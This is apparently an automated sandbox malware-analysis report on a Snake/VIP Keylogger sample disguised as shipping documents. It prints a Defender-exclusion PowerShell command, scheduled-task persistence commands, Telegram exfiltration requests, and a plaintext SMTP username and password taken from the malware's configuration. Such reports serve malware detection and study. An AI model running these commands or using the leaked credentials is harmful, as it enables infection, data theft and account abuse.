0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137740:$s1: UnHook 0x17a960:$s1: UnHook 0x1bd980:$s1: UnHook 0x137747:$s2: SetHook 0x17a967:$s2: SetHook 0x1bd987:$s2: SetHook 0x13774f:$s3: CallNextHook 0x17a96f:$s3: CallNextHook 0x1bd98f:$s3: CallNextHook 0x13775c:$s4: _hook 0x17a97c:$s4: _hook 0x1bd99c:$s4: _hook
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShippingDocuments240384.exe", ParentImage: C:\Users\user\Desktop\rShippingDocuments240384.exe, ParentProcessId: 2216, ParentProcessName: rShippingDocuments240384.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", ProcessId: 5428, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tdcorV.exe, ParentImage: C:\Users\user\AppData\Roaming\tdcorV.exe, ParentProcessId: 5056, ParentProcessName: tdcorV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp", ProcessId: 3324, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 166.62.28.124, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4684, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 51301

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShippingDocuments240384.exe", ParentImage: C:\Users\user\Desktop\rShippingDocuments240384.exe, ParentProcessId: 2216, ParentProcessName: rShippingDocuments240384.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", ProcessId: 4520, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShippingDocuments240384.exe", ParentImage: C:\Users\user\Desktop\rShippingDocuments240384.exe, ParentProcessId: 2216, ParentProcessName: rShippingDocuments240384.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe", ProcessId: 5428, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShippingDocuments240384.exe", ParentImage: C:\Users\user\Desktop\rShippingDocuments240384.exe, ParentProcessId: 2216, ParentProcessName: rShippingDocuments240384.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp", ProcessId: 4520, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T10:32:11.518744+0100	2803305	3	Unknown Traffic	192.168.2.8	49710	188.114.97.3	443	TCP
2024-10-29T10:32:14.975349+0100	2803305	3	Unknown Traffic	192.168.2.8	49717	188.114.97.3	443	TCP
2024-10-29T10:32:16.069816+0100	2803305	3	Unknown Traffic	192.168.2.8	49719	188.114.97.3	443	TCP
2024-10-29T10:32:17.857119+0100	2803305	3	Unknown Traffic	192.168.2.8	49723	188.114.97.3	443	TCP
2024-10-29T10:32:18.383817+0100	2803305	3	Unknown Traffic	192.168.2.8	49724	188.114.97.3	443	TCP
2024-10-29T10:32:21.165381+0100	2803305	3	Unknown Traffic	192.168.2.8	49731	188.114.97.3	443	TCP
2024-10-29T10:32:27.414851+0100	2803305	3	Unknown Traffic	192.168.2.8	49745	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T10:32:08.859254+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	132.226.247.73	80	TCP
2024-10-29T10:32:10.830646+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	132.226.247.73	80	TCP
2024-10-29T10:32:12.520011+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	132.226.247.73	80	TCP
2024-10-29T10:32:13.316891+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	132.226.247.73	80	TCP
2024-10-29T10:32:14.113780+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49716	132.226.247.73	80	TCP
2024-10-29T10:32:15.354641+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	132.226.247.73	80	TCP
2024-10-29T10:32:17.004380+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49721	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587", "Version": "4.4"}
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tdcorV.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: rShippingDocuments240384.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\tdcorV.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: rShippingDocuments240384.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: rShippingDocuments240384.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.8:51299 -> 188.114.97.3:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:51300 version: TLS 1.2

Source: rShippingDocuments240384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: dKuN.pdb source: rShippingDocuments240384.exe, tdcorV.exe.0.dr
Source:	Binary string: dKuN.pdbSHA256 source: rShippingDocuments240384.exe, tdcorV.exe.0.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 013BF45Dh	9_2_013BF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 013BF45Dh	9_2_013BF52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 013BF45Dh	9_2_013BF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 013BFC19h	9_2_013BF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 030AF45Dh	14_2_030AF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 030AF45Dh	14_2_030AF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 030AFC19h	14_2_030AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9E501h	14_2_06C9E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C90D0Dh	14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C91697h	14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C931E0h	14_2_06C92DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C92C19h	14_2_06C92968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9E959h	14_2_06C9E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9E0A9h	14_2_06C9DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9F661h	14_2_06C9F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9F209h	14_2_06C9EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9EDB1h	14_2_06C9EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9D3A1h	14_2_06C9D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9CF49h	14_2_06C9CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06C90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9FAB9h	14_2_06C9F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C931E0h	14_2_06C92DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9DC51h	14_2_06C9D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C9D7F9h	14_2_06C9D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C931E0h	14_2_06C9310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.8:51301 -> 166.62.28.124:587

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.8:51301 -> 166.62.28.124:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.8:51299 -> 188.114.97.3:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
